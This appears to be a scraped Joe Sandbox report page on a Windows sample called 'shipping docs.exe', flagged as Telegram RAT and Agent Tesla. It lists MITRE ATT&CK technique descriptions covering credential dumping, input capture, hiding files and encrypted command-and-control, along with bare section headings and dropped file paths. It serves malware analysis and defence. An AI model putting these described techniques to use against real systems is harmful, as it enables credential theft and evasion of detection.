Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipping docs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VMqTMMD.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping docs.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yVGAJfiVEvtg.exe.log

C:\Users\user\AppData\Local\Temp\tmp3418.tmp

C:\Users\user\AppData\Local\Temp\tmp7934.tmp

C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp

C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe

C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
shipping docs.exe

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre